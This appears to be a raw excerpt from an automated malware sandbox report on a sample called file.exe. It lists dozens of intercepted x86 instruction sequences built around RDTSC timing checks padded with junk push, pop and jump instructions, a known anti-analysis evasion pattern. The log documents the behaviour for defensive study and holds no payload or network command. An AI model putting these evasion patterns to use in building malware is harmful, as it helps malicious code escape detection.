Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 938217 second address: 938225 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6D18BC6CB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BFE4 second address: 93BFEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BFEA second address: 93BFFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6D18BC6CBBh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93BFFE second address: 93C00F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6D19596916h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93C00F second address: 93C017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93C17B second address: 93C17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93C2F6 second address: 93C30E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CC4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93C30E second address: 93C31C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F6D19596916h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93C31C second address: 93C320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 93C46F second address: 93C473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94894B second address: 948951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 948951 second address: 948955 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94902B second address: 949030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 949174 second address: 949178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 949178 second address: 949195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F6D18BC6CC5h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 949A30 second address: 949A36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 949A36 second address: 949A3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 94806D second address: 948072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 948072 second address: 948093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F6D18BC6CB6h 0x0000000d jmp 00007F6D18BC6CC4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88AD2D second address: 88AD40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6D19596916h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F6D19596916h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88AD40 second address: 88AD65 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6D18BC6CC2h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88AD65 second address: 88AD6F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6D19596916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88AD6F second address: 88AD7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CBAh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88AD7F second address: 88AD93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D19596920h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88AD93 second address: 88AD97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95FA52 second address: 95FA60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6D19596916h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 971FC3 second address: 971FC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 971FC7 second address: 971FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 971FCD second address: 971FD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F6D18BC6CB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 887832 second address: 887836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 887836 second address: 88784E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CBEh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88784E second address: 88786A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D19596928h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9745C9 second address: 9745CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97C290 second address: 97C2B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D19596920h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F6D1959691Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97AB34 second address: 97AB3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97AB3F second address: 97AB43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97AB43 second address: 97AB6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F6D18BC6CC7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97ADF9 second address: 97AE04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97AF59 second address: 97AF5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97AF5E second address: 97AF89 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6D19596918h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b jmp 00007F6D19596924h 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F6D19596916h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97AF89 second address: 97AFBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CC5h 0x00000007 jmp 00007F6D18BC6CC3h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jl 00007F6D18BC6CCDh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97AFBD second address: 97AFD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D19596921h 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97AFD5 second address: 97AFDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97B157 second address: 97B160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97B160 second address: 97B165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97B165 second address: 97B171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F6D19596916h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 97B171 second address: 97B175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9808C7 second address: 9808E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F6D19596920h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E772 second address: 98E778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E778 second address: 98E77C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99C683 second address: 99C687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99C687 second address: 99C68B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99C68B second address: 99C6AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F6D18BC6CC8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99C6AD second address: 99C6B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99C6B1 second address: 99C6BE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99C6BE second address: 99C6C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99C6C6 second address: 99C6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99DFDB second address: 99DFF0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6D19596916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F6D1959691Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99DFF0 second address: 99E007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jmp 00007F6D18BC6CBFh 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99DE15 second address: 99DE19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99DE19 second address: 99DE1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99DE1F second address: 99DE23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A07B7 second address: 9A07C1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6D18BC6CB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A07C1 second address: 9A07DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F6D1959691Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A095C second address: 9A0970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F6D18BC6CB6h 0x0000000c popad 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0970 second address: 9A0986 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6D19596916h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007F6D19596916h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BC23B second address: 9BC244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BB335 second address: 9BB33D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BB608 second address: 9BB637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6D18BC6CB6h 0x0000000a jmp 00007F6D18BC6CC8h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 je 00007F6D18BC6CC8h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BB637 second address: 9BB63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BBA12 second address: 9BBA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 jmp 00007F6D18BC6CC4h 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BBB42 second address: 9BBB46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BBB46 second address: 9BBB63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CBBh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F6D18BC6CBCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BBB63 second address: 9BBB6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BBB6B second address: 9BBB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BBDE8 second address: 9BBDF8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6D19596918h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BBF56 second address: 9BBF5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BBF5D second address: 9BBF69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jo 00007F6D19596916h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BBF69 second address: 9BBF73 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C023D second address: 9C0241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C0241 second address: 9C0247 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C076A second address: 9C07F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D1959691Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnl 00007F6D19596922h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F6D19596918h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000017h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b jnp 00007F6D19596918h 0x00000031 push edi 0x00000032 pop edx 0x00000033 push dword ptr [ebp+122D206Eh] 0x00000039 and edx, dword ptr [ebp+122D2378h] 0x0000003f call 00007F6D19596919h 0x00000044 jmp 00007F6D1959691Bh 0x00000049 push eax 0x0000004a jnc 00007F6D19596922h 0x00000050 mov eax, dword ptr [esp+04h] 0x00000054 push eax 0x00000055 push edx 0x00000056 push ecx 0x00000057 jl 00007F6D19596916h 0x0000005d pop ecx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C07F4 second address: 9C080F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C080F second address: 9C0813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C1FA0 second address: 9C1FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C1FA7 second address: 9C1FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C1FAD second address: 9C1FB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88C84A second address: 88C856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6D1959691Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88C856 second address: 88C866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88C866 second address: 88C86A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380EB3 second address: 5380ECF instructions: 0x00000000 rdtsc 0x00000002 mov ax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push ebx 0x00000009 pushad 0x0000000a movzx eax, dx 0x0000000d mov cx, dx 0x00000010 popad 0x00000011 mov dword ptr [esp], ebp 0x00000014 pushad 0x00000015 mov ebx, 3F444340h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0022 second address: 53D0086 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, D1A2h 0x00000007 jmp 00007F6D19596923h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov ecx, 12C53A9Bh 0x00000016 movzx esi, dx 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F6D19596928h 0x00000022 jmp 00007F6D19596925h 0x00000027 popfd 0x00000028 movzx ecx, bx 0x0000002b popad 0x0000002c xchg eax, ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0086 second address: 53D008A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D008A second address: 53D0090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D0090 second address: 53D009E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D18BC6CBAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D009E second address: 53D00A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53D00A2 second address: 53D00DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F6D18BC6CC7h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F6D18BC6CC5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360118 second address: 536011E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536011E second address: 5360122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
